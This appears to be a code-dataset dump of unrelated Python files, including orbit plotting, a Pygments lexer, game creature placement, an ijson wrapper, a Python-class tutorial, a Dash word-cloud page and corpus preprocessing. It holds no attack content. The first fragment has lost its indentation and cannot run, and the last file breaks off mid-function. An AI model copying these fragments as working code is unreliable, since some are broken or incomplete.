##### HALO ORBITS PLOTTING TOOL #####
#
# Importing required functions
#
import numpy as np
from scipy import linalg
from scipy.integrate import solve_ivp
from .intFun import ThreeBodyProp, DiffCorrection
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Initial conditions
if Data['flags'][0] or Data['flags'][1] or Data['method'] == 'insitu':
[x0, z0, vy0] = Data['IC']
else:
fid = open(Data['IC'],'r')
info = fid.readlines()
IC = []
for i in info:
if i.split()[0] == '#':
IC.append(i.split()[-1])
if len(IC) == 3:
[x0, z0, vy0] = IC
elif len(IC) == 6:
[x0, z0, vy0] = [IC[0], IC[2], IC[4]]
else:
raise Exception('Halo_Num_Comp:ICError.' +\
' The text file selected does not have the right format!')
q0 = np.array([x0, 0, z0, 0, vy0, 0])
tspan = np.linspace(0, Data['tf'], int(Data['tf']/Data['prnt_out_dt']) +1)
sol = solve_ivp(ThreeBodyProp, [0, Data['tf']],
q0, t_eval = tspan, args = (Data['mu'],),
atol = 1e-15,
rtol = 1e-10)
times_po = sol.t
states_po = sol.y
x = states_po[0]; y = states_po[1]; z = states_po[2]
q0 = np.zeros(42)
q0[:6] = [x0, 0, z0, 0, vy0, 0]
phi0 = np.identity(6)
q0[6:] = phi0.ravel()
sol = solve_ivp(DiffCorrection, [0, Data['tf']],
q0, args = (Data['mu'],),
atol = 1e-15,
rtol = 1e-10)
q = sol.y
Phi = q[6:,-1].reshape(6, -1)
[eigval, eigvec] = linalg.eig(Phi)
# Figures
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x, y, z)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
fig2, (ax1, ax2, ax3) = plt.subplots(1, 3, constrained_layout = True)
ax1.plot(x, y)
ax1.set(xlabel='x', ylabel='y')
ax2.plot(x, z)
ax2.set(xlabel='x', ylabel='z')
ax3.plot(y, z)
ax3.set(xlabel='y', ylabel='z')
plt.show()
return (states_po, Data['tf'], eigvec[:, np.imag(eigval) == 0])
| StarcoderdataPython |
3205454 | # flake8: noqa
from __future__ import absolute_import
from pygments.lexer import RegexLexer, bygroups
from pygments.token import *
class FriendscriptLexer(RegexLexer):
name = 'Friendscript'
aliases = ['friendscript']
filenames = ['*.fs']
tokens = {
'root': [
(r'^#!.*\n', Comment.Hashbang),
(r'#.*\n', Comment.Single),
(r'\/.*\/[a-z]*', String.Regex),
(r'\s+(=~|%|~|!~|<<|->|!=|(?:&|\||\^|\+|-|\*|\/|=|<|>)=?)\s+', bygroups(Operator)),
(r'\s+(in|is|not)\s+', bygroups(Operator.Word)),
(r'\s+(as|break|case|continue|else|if|loop(\s+count)?|on|unset|when)\s+', bygroups(Keyword)),
(r'\d', Number),
(r'(true|false|null)', Keyword.Pseudo),
(r'\'', String.Single, 'str'),
(r'"', String.Double, 'str-double'),
(r'\$[^\d\W][\w\.]*\b', Name.Variable),
(r'[\{\},\.\[\];]', Punctuation),
(r'([\w\d]+)\s*(:)(?!:)', bygroups(Name.Attribute, Punctuation)),
(r'([\w\d][\w\d]*)(::[\w\d][\w\d]*)*', Name.Function),
(r'\s+', Text),
],
'str': [
(r'[^\']', String.Single),
(r'\'', String.Single, '#pop'),
],
'str-double': [
(r'{[^}]*}', String.Interpol),
(r'[^"]', String.Double),
(r'"', String.Double, '#pop'),
],
}
| StarcoderdataPython |
6532487 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Classes for creature generation
"""
from pyherc.aspects import log_debug, log_info
from pyherc.data import (add_character, get_locations_by_tag, blocks_movement,
safe_passage)
class CreatureAdder():
    """
    Class used to add creatures during level generation
    """
    @log_debug
    def __init__(self, creatures, configuration, rng):
        """
        Default constructor
        :param creatures: factory callable that builds a creature by name
        :type creatures: callable
        :param configuration: configuration entries; also exposes level_types
        :type configuration: CreatureAdderConfiguration
        :param rng: random number generator
        :type rng: Random
        """
        super().__init__()
        self.creatures = creatures
        self.configuration = configuration
        self.rng = rng
    @log_debug
    def __get_level_types(self):
        """
        Get level types this adder can be used at
        :returns: level types this adder can be used at
        :rtype: [string]
        """
        return self.configuration.level_types
    def __call__(self, level):
        """
        Add creatures to level according to configuration
        """
        self.add_creatures(level)
    @log_info
    def add_creatures(self, level):
        """
        Add creatures to level according to configuration
        :param level: level to add creatures
        :type level: Level
        """
        creatures = []
        # Each configuration entry specifies a creature name and an
        # inclusive min/max count; the actual amount is rolled per entry.
        for creature in self.configuration:
            amount = self.rng.randint(creature['min_amount'],
                                      creature['max_amount'])
            creatures.extend(self.generate_creatures(creature['name'],
                                                     amount))
        self.place_creatures(creatures, self.configuration, level)
    @log_debug
    def generate_creatures(self, name, amount):
        """
        Generate creatures
        :param name: name of the creatures to generate
        :type name: string
        :param amount: amount of creatures to generate
        :type amount: integer
        :returns: generated creatures
        :rtype: [Character]
        """
        creatures = []
        for i in range(amount):
            new_creature = self.creatures(name)
            creatures.append(new_creature)
        return creatures
    @log_debug
    def place_creatures(self, creatures, creature_list, level):
        """
        Place creatures into a level
        :param creatures: creatures to place
        :type creatures: [Character]
        :param creature_list: specification where to place creatures
        :type creature_list: dict
        :param level: level to place creatures
        :type level: Level
        """
        for creature in creatures:
            # Location tags configured for this creature's name;
            # default to 'any' when none are configured.
            location_types = [x['location'] for x in creature_list
                              if x['name'] == creature.name]
            if not location_types:
                location_types = ['any']
            locations = []
            for location_type in location_types:
                locations.extend([location for location in (get_locations_by_tag(level,
                                                                                 location_type))
                                  if safe_passage(level, location)])
            # NOTE: if no safe location exists the creature is silently
            # skipped rather than placed somewhere unsafe.
            if locations:
                location = self.rng.choice(locations)
                add_character(level, location, creature)
    level_types = property(__get_level_types)
| StarcoderdataPython |
88451 | <gh_stars>100-1000
#
# Contributed by <NAME> <<EMAIL>>
#
# ICRAR - International Centre for Radio Astronomy Research
# (c) UWA - The University of Western Australia, 2016
# Copyright by UWA (in the framework of the ICRAR)
#
'''
Wrapper for _yajl2 C extension module
'''
from ijson import common, compat, utils
from . import _yajl2
_get_buf_size = lambda kwargs: kwargs.pop('buf_size', 64 * 1024)
@utils.coroutine
def basic_parse_basecoro(target, **kwargs):
    """Coroutine that pushes basic parse events into *target* via the C extension."""
    return _yajl2.basic_parse_basecoro(target.send, **kwargs)
def basic_parse_gen(file, **kwargs):
    """Generator of basic (event, value) pairs parsed from *file*."""
    f = compat.bytes_reader(file)
    buf_size = _get_buf_size(kwargs)
    return _yajl2.basic_parse(f, buf_size, **kwargs)
def basic_parse_async(file, **kwargs):
    """Async-iterable variant of basic_parse for async file objects."""
    buf_size = _get_buf_size(kwargs)
    return _yajl2.basic_parse_async(file, buf_size, **kwargs)
@utils.coroutine
def parse_basecoro(target, **kwargs):
    """Coroutine that pushes (prefix, event, value) triples into *target*."""
    return _yajl2.parse_basecoro(target.send, **kwargs)
def parse_gen(file, **kwargs):
    """Generator of (prefix, event, value) triples parsed from *file*."""
    f = compat.bytes_reader(file)
    buf_size = _get_buf_size(kwargs)
    return _yajl2.parse(f, buf_size, **kwargs)
def parse_async(file, **kwargs):
    """Async-iterable variant of parse for async file objects."""
    buf_size = _get_buf_size(kwargs)
    return _yajl2.parse_async(file, buf_size, **kwargs)
@utils.coroutine
def kvitems_basecoro(target, prefix, map_type=None, **kwargs):
    """Coroutine that pushes (key, value) pairs found under *prefix* into *target*."""
    return _yajl2.kvitems_basecoro(target.send, prefix, map_type, **kwargs)
def kvitems_gen(file, prefix, map_type=None, **kwargs):
    """Generator of (key, value) pairs found under *prefix* in *file*."""
    f = compat.bytes_reader(file)
    buf_size = _get_buf_size(kwargs)
    return _yajl2.kvitems(f, buf_size, prefix, map_type, **kwargs)
def kvitems_async(file, prefix, map_type=None, **kwargs):
    """Async-iterable variant of kvitems for async file objects."""
    buf_size = _get_buf_size(kwargs)
    return _yajl2.kvitems_async(file, buf_size, prefix, map_type, **kwargs)
@utils.coroutine
def items_basecoro(target, prefix, map_type=None, **kwargs):
    """Coroutine that pushes fully-built objects found at *prefix* into *target*."""
    return _yajl2.items_basecoro(target.send, prefix, map_type, **kwargs)
def items_gen(file, prefix, map_type=None, **kwargs):
    """Generator of fully-built objects found at *prefix* in *file*."""
    f = compat.bytes_reader(file)
    buf_size = _get_buf_size(kwargs)
    return _yajl2.items(f, buf_size, prefix, map_type, **kwargs)
def items_async(file, prefix, map_type=None, **kwargs):
    """Async-iterable variant of items for async file objects."""
    buf_size = _get_buf_size(kwargs)
    return _yajl2.items_async(file, buf_size, prefix, map_type, **kwargs)
common.enrich_backend(globals())
| StarcoderdataPython |
3324179 | <reponame>strangepleasures/kotlin-jupyter<filename>distrib/kotlin_kernel/env_names.py<gh_stars>100-1000
# standard JVM options environment variable
JAVA_OPTS = "JAVA_OPTS"
# specific JVM options environment variable
KERNEL_JAVA_OPTS = "KOTLIN_JUPYTER_JAVA_OPTS"
# additional JVM options to add to either JAVA_OPTS or KOTLIN_JUPYTER_JAVA_OPTS
KERNEL_EXTRA_JAVA_OPTS = "KOTLIN_JUPYTER_JAVA_OPTS_EXTRA"
# used internally to add JVM options without overwriting KOTLIN_JUPYTER_JAVA_OPTS_EXTRA
KERNEL_INTERNAL_ADDED_JAVA_OPTS = "KOTLIN_JUPYTER_KERNEL_EXTRA_JVM_OPTS"
# standard JDK location environment variable
JAVA_HOME = "JAVA_HOME"
# specific JDK location environment variable
KERNEL_JAVA_HOME = "KOTLIN_JUPYTER_JAVA_HOME"
| StarcoderdataPython |
11342205 |
# -*- coding: utf-8 -*-
'''
File name: code\factorial_digit_sum\sol_20.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #20 :: Factorial digit sum
#
# For more information see:
# https://projecteuler.net/problem=20
# Problem Statement
'''
n! means n × (n − 1) × ... × 3 × 2 × 1
For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.
Find the sum of the digits in the number 100!
'''
# Solution
# Solution Approach
'''
'''
| StarcoderdataPython |
80800 | <filename>ADVANCED/chapter05_02.py
# Chapter05-2
# 파이썬 심화
# 파이썬 클래스 관련 메소드 심화
# private 속성실습
# - self.__a : `__` 이용한 private 변수 생성하여 instence 에서 접근불가능하게 만든다.
# - Getter, Setter 이용하여 메소드를 활용해서 변경가능하게 만든다.
# - 변수명으로 method 생성하는 것이 관례
# - Getter : @property 어노테이션 이용함
# - Setter : @[getter 메소드명].setter / Getter의 메소드명과 동일하게 생성해야함.
# __slot__ 예제 - 메모리 절감효과
# 객체슬라이딩, 인덱싱
# ABC, 상속, 오버라이딩
# 파이썬 클래스 특별 메소드 심화 활용 및 상속
# Class ABC
# class 선언
class VectorP(object):
    """2-D vector demonstrating name-mangled private attributes with
    property-based getters and setters.

    ``self.__x`` / ``self.__y`` are name-mangled, so instances cannot
    reach them directly; use the ``x`` / ``y`` properties.  The lesson's
    asymmetry is kept on purpose: the ``y`` setter validates its input
    (rejecting values below 30) while the ``x`` setter does not.
    """
    def __init__(self, x, y):
        self.__x = float(x)
        self.__y = float(y)
    def __iter__(self):
        # BUG FIX: the debug message wrongly said '__init__ call'.
        print('__iter__ call')
        return (i for i in (self.__x, self.__y))  # generator over (x, y)
    # Getter role
    @property
    def x(self):
        print('Called property X')
        return self.__x
    # Setter role - must share the getter's name
    @x.setter
    def x(self, v):
        print('Called property X Setter')
        self.__x = v
    # Getter role
    @property
    def y(self):
        print('Called property Y')
        return self.__y
    # Setter role - must share the getter's name; validates the input
    @y.setter
    def y(self, v):
        print('Called property Y Setter')
        if v < 30:
            raise ValueError('30 below is not possible')
        self.__y = float(v)
v = VectorP(20, 40)
# 객체선언
# '__' = private , 인스턴스를 이용하더라도 접근불가
# print('EX1-1 -', v.__x, v.__y)
# Getter, Setter
print(v.x)
v.x = 10
v.y = 40
print('EX1-2 -', dir(v), v.__dict__)
print('EX1-3 -', v.x, v.y)
# Iter 확인
for val in v:
print('EX1-4 -', val)
print()
print()
# __slot__
# 파이썬 인터프리터에게 통보
# 핵심 : 해당 클래스가 가지는 속성을 제한
# __dict__ 속성 최적화 -> 다수 객체 생성시 -> 메모리 사용 공간 대폭 감소
# 해당 클래스에 만들어진 인스턴스 속성 관리에 딕셔너리 대신 Set 형태를 사용
# 반드시 문자열로 입력해야 한다.
# 참조설명 - https://planbs.tistory.com/entry/Python-slots
# 알려진(known) 속성들로 구성된 클래스들의 경우 이러한 구조는 딕셔너리가 낭비하는 RAM 때문에 병목이 발생할 수 있습니다.
# 클래스 레벨에 __slots__라는 변수를 설정해서, 해당 클래스에 의해 만들어진 객체의 인스턴스 속성 관리에 딕셔너리 대신
# 속성에 대한 고정된(fixed) set을 사용하도록 할 수 있습니다.
class TestA(object):
    """__slots__ demo: instances may only carry attribute 'a' and have
    no per-instance __dict__, which reduces memory use."""
    __slots__ = ('a',)
class TestB:
    """Control class without __slots__; instances carry a normal __dict__."""
    pass
use_slot = TestA()
no_slot = TestB()
print('EX2-1 -', use_slot)
# print('EX2-2 -', use_slot.__dict__) # error
print('EX2-3 -', no_slot)
print('EX2-4 -', no_slot.__dict__)
# 메모리 사용량 비교
import timeit
# 측정을 위한 함수 선언
def repeat_outer(obj):
    """Return a zero-argument closure that sets then deletes ``obj.a``.

    Used with ``timeit`` to benchmark attribute churn on *obj*.
    """
    def _set_and_delete():
        obj.a = 'TEST'
        del obj.a
    return _set_and_delete
print(min(timeit.repeat(repeat_outer(use_slot), number=10000)))
print(min(timeit.repeat(repeat_outer(no_slot), number=10000)))
print()
print()
# 객체 슬라이싱
class Objects:
    """Sequence-like demo: len() and (slice) indexing delegate to an
    internal list of 1, 4, 7, ..., 97."""
    def __init__(self):
        # Identical contents to the original comprehension.
        self._numbers = list(range(1, 100, 3))
    def __len__(self):
        return len(self._numbers)
    def __getitem__(self, idx):
        # Supports integers, negative indices and slices, like the list.
        return self._numbers[idx]
s = Objects()
print('EX3-1 -', s.__dict__)
print('EX3-2 -', len(s))
print('EX3-3 -', len(s._numbers))
print('EX3-4 -', s[1:100])
print('EX3-5 -', s[-1])
# 시퀀스객체[::증가폭]
print('EX3-5 -', s[::10])
# 시퀀스객체[시작인덱스::증가폭]
print('EX3-6 -', s[::5])
# 파이썬 추상클래스
# 참고 : https://docs.python.org/3/library/collections.abc.html
# 추상클래스 사용이유
# 자체적으로 객체 생성 불가
# 상속을 통해서 자식 클래스에서 인스턴스를 생성해야함
# 개발과 관련된 공통된 내용(필드, 메소드)을 추출 및 통합해서 공통된 내용으로 작성하게 하는 것
# Sequence 상속 받지 않았지만, 자동으로 __iter__, __contailn__ 기능 작동
# 객체 전체를 자동으로조사 -> 시퀀스 프로토콜
class IterTestA:
    """Sequence-protocol demo: defining only __getitem__ makes the object
    indexable, sliceable, iterable and usable with ``in`` (Python falls
    back to indexing from 0 until IndexError)."""
    def __getitem__(self, item):
        print(repr(item))
        return range(1, 50, 2)[item] # range(1, 50, 2)
i1 = IterTestA()
print('EX4-1 -', i1[4])
print('EX4-2 -', i1[4:10])
print('EX4-3 -', 3 in i1[1:10])
# print('EX4-4 -', [i for i in i1]) # 이해가 안됨
# print('EX4-4 -', [i for i in i1[:]])
print()
print()
# Sequence 상속
# 요구사항인 추상메소드를 모두 구현해야 동작
from collections.abc import Sequence
class IterTestB(Sequence):
    """collections.abc.Sequence subclass: implementing __getitem__ and
    __len__ provides iteration, ``in``, index(), count() and reversed()
    for free via the ABC mixins."""
    def __getitem__(self, item):
        print('__getitem__', repr(item))
        return range(1, 50, 2)[item]
    def __len__(self):
        # BUG FIX: __len__ previously took an extra ``idx`` argument, so
        # len(obj) — and every Sequence mixin that relies on it — raised
        # TypeError.  __len__ must be callable with no arguments.
        print('__len__')
        return len(range(1, 50, 2))
i2 = IterTestB()
print('EX4-5 -', i2[4])
print('EX4-6 -', i2[4:10])
print('EX4-7 -', 3 in i2[1:10])
print()
print()
# abc 활용예제 - abstract class
import abc
class RandomMachine(abc.ABC): # on Python <= 3.4 use metaclass=abc.ABCMeta
    """Abstract base class for machines that dispense random items."""
    # __metaclass__ = abc.ABCMeta
    # abstract method
    @abc.abstractmethod
    def load(self, iterobj):
        """Add items from an iterable"""
    # abstract method
    @abc.abstractmethod
    def pick(self):
        """Remove and return one random item"""
    def inspect(self):
        # Drain the machine by calling pick() until it raises
        # LookupError, then report everything that was inside, sorted.
        items = []
        while True:
            try:
                items.append(self.pick())
            except LookupError:
                break
        return tuple(sorted(items))
import random
class CraneMachine(RandomMachine):
    """Concrete RandomMachine backed by a shuffled in-memory list."""
    def __init__(self, items):
        self._randomizer = random.SystemRandom()
        self._items = []
        self.load(items)
    def load(self, iterobj):
        """Append the iterable's items and reshuffle the whole store."""
        self._items.extend(iterobj)
        self._randomizer.shuffle(self._items)
    def pick(self):
        """Remove and return one item; LookupError when the box is empty."""
        if not self._items:
            raise LookupError('Empty Crane Box')
        return self._items.pop()
    def __call__(self):
        # Calling the machine is shorthand for pick().
        return self.pick()
# 서브클래스 확인 - issubclass(자식, 부모)
print('EX5-1 -', issubclass(RandomMachine, CraneMachine))
print('EX5-2 -', issubclass(CraneMachine, RandomMachine))
# 상속 구조 확인
print('EX5-3 -', CraneMachine.__mro__)
cm = CraneMachine(range(1, 100)) # 추상메소드 구현 안하면 에러
print('EX5-4 -', cm._items)
print('EX5-5 -', cm.pick())
print('EX5-6 -', cm())
print('EX5-7 -', cm.inspect())
| StarcoderdataPython |
312759 | import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import glob
#import matplotlib.pyplot as plt
#from wordcloud import WordCloud, STOPWORDS
from PIL import Image
from app_temp import app
path_list = ['./apps/analysis_data/task6', './apps/analysis_data/task7'] # use your path
task_list = ['task6', 'task7']
df = {}
for i, path in enumerate(path_list):
filenames = glob.glob(path+"/*.parquet")
dfs = []
for filename in filenames:
dfs.append(pd.read_parquet(filename))
# Concatenate all data into one DataFrame
df[task_list[i]] = pd.concat(dfs, ignore_index=True)
# ****** Task 6 & Task 7 word-cloud figures ******
# The two figures were previously built by two nearly identical ~55-line
# copy-pasted sections; the shared construction now lives in
# _wordcloud_figure().  NOTE: the PNGs are pre-generated; the original
# regeneration code (matplotlib + wordcloud, commented out) is dropped —
# regenerate the images offline if they go missing.

# Figure geometry (kept at module level for backwards compatibility).
img_width = 1600
img_height = 900
scale_factor = 0.8


def _wordcloud_figure(image):
    """Return a plotly Figure displaying *image* as a static background.

    An invisible scatter trace spanning the scaled image extent is added
    so plotly's autoresize logic works; both axes are hidden and the
    y-axis is scale-anchored to x to keep the aspect ratio constant.
    """
    fig = go.Figure()
    # Invisible scatter trace: helps the autoresize logic work.
    fig.add_trace(
        go.Scatter(
            x=[0, img_width * scale_factor],
            y=[0, img_height * scale_factor],
            mode="markers",
            marker_opacity=0,
        )
    )
    fig.update_xaxes(visible=False, range=[0, img_width * scale_factor])
    fig.update_yaxes(
        visible=False,
        range=[0, img_height * scale_factor],
        # scaleanchor keeps the aspect ratio constant
        scaleanchor="x",
    )
    fig.add_layout_image(
        dict(
            x=0,
            sizex=img_width * scale_factor,
            y=img_height * scale_factor,
            sizey=img_height * scale_factor,
            xref="x",
            yref="y",
            opacity=1.0,
            layer="below",
            sizing="stretch",
            source=image,
        )
    )
    fig.update_layout(
        width=img_width * scale_factor,
        height=img_height * scale_factor,
        margin={"l": 0, "r": 0, "t": 0, "b": 0},
    )
    return fig


img6 = Image.open('./img/task6_Word_Cloud.png')
fig6 = _wordcloud_figure(img6)
img7 = Image.open('./img/task7_Word_Cloud.png')
fig7 = _wordcloud_figure(img7)
layout = html.Div([
html.Div(id='task6_container', children=[
html.H2(id='header_task6', style={'text-align': 'center'}, children='Most Common Words in Movie Titles'),
html.Div(id='task6_p', children=[
html.P(
id="task6_insight",
children="Love, Day, Man and Girl seem to be the most frequent words used in movie titles.",
),
]),
dcc.Graph(figure=fig6, style={"margin": "auto", "width" : '90%'})
]),
html.Div(id='task7_container', children=[
html.H2(id='header_task7', style={'text-align': 'center'}, children='Most Common Keyword in Movies'),
html.Div(id='task7_p', children=[
html.P(
id="task7_insight",
children="Woman Director,independent film and murder seem to be the most frequent keywords associated with movies which give us insight into themes the publishers think would be profitable to push.",
),
]),
dcc.Graph(figure=fig7, style={"margin": "auto", "width" : '90%'})
]),
]) | StarcoderdataPython |
3367964 | <filename>src/preprocess_CR/S5_proxy_grounded.py
import pickle
import random
import math
from pathlib import Path
from typing import Tuple, List, Dict, DefaultDict, Counter, Iterable, Optional
from nltk.corpus import stopwords
from tqdm import tqdm
from data import GroundedWord, Sentence, LabeledDoc
procedural_words = {
'yield', 'motion', 'order', 'ordered', 'quorum', 'roll', 'unanimous',
'mr', 'madam', 'speaker', 'chairman', 'president', 'senator',
'gentleman', 'colleague',
'today', 'rise', 'rise today', 'pleased_to_introduce',
'introducing_today', 'would_like'
}
discard = set(stopwords.words('english')).union(procedural_words)
random.seed(1)
# punctuations = '!"#$%&\'()*+,-—./:;<=>?@[\\]^`{|}~' # excluding underscore
# remove_punctutation = str.maketrans('', '', punctuations)
# remove_numbers = str.maketrans('', '', '0123456789')
def subsampling(
    frequency: Counter[str],
    heuristic: Optional[str],
    threshold: float,
) -> Dict[str, float]:
    """
    Compute per-word keep probabilities for downsampling frequent words.

    Implements both variants of Mikolov et al. 2013: 'code' uses the
    formula from the annotated C implementation, 'paper' the one printed
    in the paper.  With heuristic=None every word is kept.
    http://mccormickml.com/2017/01/11/word2vec-tutorial-part-2-negative-sampling
    NOTE: the C code's default threshold is 1e-3, not the paper's 1e-5.
    """
    if heuristic is None:
        # Keep everything: probability 1 for any word queried.
        return DefaultDict(lambda: 1)
    if heuristic not in ('code', 'paper'):
        raise ValueError('Unknown heuristic of subsampling.')
    total_count = sum(frequency.values())
    keep_prob: Dict[str, float] = {}
    for word, count in frequency.items():
        rel_freq = count / total_count
        if heuristic == 'code':
            keep_prob[word] = (
                (math.sqrt(rel_freq / threshold) + 1)
                * (threshold / rel_freq)
            )
        else:  # 'paper'
            keep_prob[word] = math.sqrt(threshold / rel_freq)
    return keep_prob
def partition(speeches: List, num_chunks: int) -> Iterable[List]:
    """Split *speeches* into *num_chunks* consecutive chunks.

    The first num_chunks - 1 chunks contain len(speeches) // num_chunks
    elements each; the final chunk absorbs the remainder.

    BUG FIX: the final chunk used ``speeches[speech_index:-1]``, which
    silently dropped the last element of the input; it now yields
    through the end of the list.
    """
    chunk_size = len(speeches) // num_chunks
    speech_index = 0
    for _ in range(num_chunks - 1):
        yield speeches[speech_index:speech_index + chunk_size]
        speech_index += chunk_size
    yield speeches[speech_index:]
def export_sorted_frequency(
        raw_frequency: Counter[str],
        subsampled_frequency: Counter[str],
        min_freq: int,
        out_path: str
) -> None:
    """Write a TSV of words whose raw frequency exceeds *min_freq*.

    Each line holds the raw frequency, the post-subsampling frequency
    (0 if the word was subsampled away entirely), and the word itself,
    sorted by raw frequency in descending order.
    """
    rows = [
        (raw, subsampled_frequency.get(word, 0), word)
        for word, raw in raw_frequency.items()
        if raw > min_freq
    ]
    rows.sort(key=lambda row: row[0], reverse=True)
    with open(out_path, 'w') as handle:
        handle.writelines(
            f'{raw:,}\t{final:,}\t{word}\n' for raw, final, word in rows
        )
def export_sampled_frequency_by_party(
        D_raw: Counter[str],
        R_raw: Counter[str],
        D_final: Counter[str],
        R_final: Counter[str],
        word_to_id: Dict[str, int],
        out_path: str
) -> None:
    """Write per-party raw vs. sampled frequencies for every vocab word.

    Produces two files: *out_path*_pretty.txt (human-readable, aligned
    columns) and *out_path*.tsv (machine-readable).  Rows are sorted so
    that nontrivial words (raw D+R frequency > 100) come first, then by
    the GOP/Dem raw-frequency ratio, both descending.
    """
    def sort_creteria(tup: Tuple) -> Tuple[bool, float]:
        # tup is (word, D_raw, R_raw, D_final, R_final); here df/rf are
        # the RAW Dem/GOP frequencies (same names are reused below for
        # the final frequencies — beware).
        df, rf = tup[1], tup[2]  # initial frequency
        if df != 0:
            ratio = rf / df
        else:
            # Avoid ZeroDivisionError; 1e-8 pushes D-absent words to the top.
            ratio = rf / 1e-8
        nontrivial = df + rf > 100
        return nontrivial, ratio
    output = []
    for word in word_to_id:
        output.append(
            (word, D_raw[word], R_raw[word], D_final[word], R_final[word]))
    output.sort(key=sort_creteria, reverse=True)
    with open(out_path + '_pretty.txt', 'w') as out_file:
        out_file.write('Sorted by GOP/Dem Ratio '
                       'Original (Dem, GOP) '
                       'Sampled & Balanced [Dem, GOP]\n')
        for word, dr, rr, df, rf in output:
            raw_freq = f'({dr:,}, {rr:,})'
            final_freq = f'[{df:,}, {rf:,}]'
            out_file.write(f'{word:<30}{raw_freq:<20}{final_freq}\n')
    with open(out_path + '.tsv', 'w') as out_file:
        out_file.write('D/R_Ratio\tTotal_Freq\tD_Freq\tR_Freq\tPhrase\n')
        for word, dr, rr, df, rf in output:
            try:
                ratio = dr / rr
            except ZeroDivisionError:
                ratio = float('inf')
            out_file.write(f'{ratio:.5}\t{dr + rr}\t{dr}\t{rr}\t{word}\n')
# def export_plain_text_corpus(
# sessions: Iterable[int],
# output_dir: str,
# in_dir: str
# ) -> None:
# output_file = open(os.path.join(output_dir, 'corpus.txt'), 'w')
# num_words_exported = 0
# for session in tqdm(sessions, desc='Loading underscored corpora'):
# for party in ('D', 'R'):
# underscored_path = os.path.join(
# in_dir, f'underscored_{party}{session}.txt')
# with open(underscored_path, 'r') as underscored_corpus:
# for line in underscored_corpus:
# num_words_exported += len(line.split())
# output_file.write(line)
# output_file.close()
# print(f'Total number of words = {num_words_exported:,}')
# def count_partisan_frequency(
# sessions: Iterable[int],
# in_dir: Path
# ) -> Tuple[Counter[str], Counter[str], Counter[str]]:
# D_freq: Counter[str] = Counter()
# R_freq: Counter[str] = Counter()
# for session in tqdm(sessions, desc='Counting partisan frequency'):
# for party in ('D', 'R'):
# underscored_path = in_dir / f'underscored_{party}{session}.txt'
# with open(underscored_path, 'r') as underscored_corpus:
# for line in underscored_corpus:
# # line = line.translate(remove_punctutation) # Done in S3
# words = line.split()
# if party == 'D':
# D_freq.update(words)
# else:
# R_freq.update(words)
# combined_frequency = D_freq + R_freq
# return combined_frequency, D_freq, R_freq
def build_vocabulary(
        frequency: Counter,
        min_frequency: int = 0,
        add_special_tokens: bool = True
) -> Tuple[
        Dict[str, int],
        Dict[int, str]]:
    """Assign consecutive integer ids to words meeting *min_frequency*.

    When *add_special_tokens* is true, ids 0-3 are reserved for [PAD],
    [UNK], [CLS] and [SEP].  Ids follow the Counter's insertion order.
    Returns (word_to_id, id_to_word).
    """
    specials = ('[PAD]', '[UNK]', '[CLS]', '[SEP]') if add_special_tokens else ()
    word_to_id: Dict[str, int] = {token: idx for idx, token in enumerate(specials)}
    for word, freq in frequency.items():
        if freq >= min_frequency and word not in word_to_id:
            word_to_id[word] = len(word_to_id)
    id_to_word = {idx: word for word, idx in word_to_id.items()}
    print(f'Vocabulary size = {len(word_to_id):,}')
    return word_to_id, id_to_word
def _export_sorted_frequency_by_party(
        D_freq: Counter[str],
        R_freq: Counter[str],
        word_to_id: Dict[str, int],
        out_path: str,
        min_freq: int
) -> None:
    """Write a TSV of per-party frequency ratios for every vocab word.

    Rows are sorted so words whose total frequency exceeds *min_freq*
    come first, then by GOP ratio and Dem frequency, all descending.
    """
    output = []
    for word in word_to_id:
        df = D_freq[word]
        rf = R_freq[word]
        total = df + rf
        above_min_freq = total > min_freq
        # NOTE: division by zero is possible if a vocab word never
        # occurs in either corpus; callers build the vocab from
        # D_freq + R_freq, so total > 0 in practice.
        dr = df / total
        rr = rf / total
        output.append((above_min_freq, dr, rr, df, rf, total, word))
    output.sort(key=lambda tup: (tup[0], tup[2], tup[4]), reverse=True)
    with open(out_path, 'w') as out_file:
        out_file.write(
            f'd_ratio\tr_ratio\td_freq\tr_freq\tphrase\n')
        for above_min_freq, dr, rr, df, rf, total, phrase in output:
            out_file.write(f'{dr:.5}\t{rr:.5}\t{df}\t{rf}\t{phrase}\n')
def export_sorted_frequency_by_party(
        sessions: Iterable[int],
        output_dir: Path,
        in_dir: Path,
        training_min_freq: int,
        sort_min_freq: int
) -> None:
    """Count per-party word frequencies across *sessions* and export them.

    Reads the underscored per-party corpora from *in_dir*, builds a
    vocabulary with *training_min_freq*, and writes
    vocab_partisan_frequency.tsv (sorted with *sort_min_freq*) into
    *output_dir*.  (*output_dir* is used with the ``/`` operator, so it
    must be a Path, not a str — annotation corrected accordingly.)
    """
    D_freq: Counter[str] = Counter()
    R_freq: Counter[str] = Counter()
    for session in tqdm(sessions, desc='Loading underscored corpora'):
        for party in ('D', 'R'):
            underscored_path = in_dir / f'underscored_{party}{session}.txt'
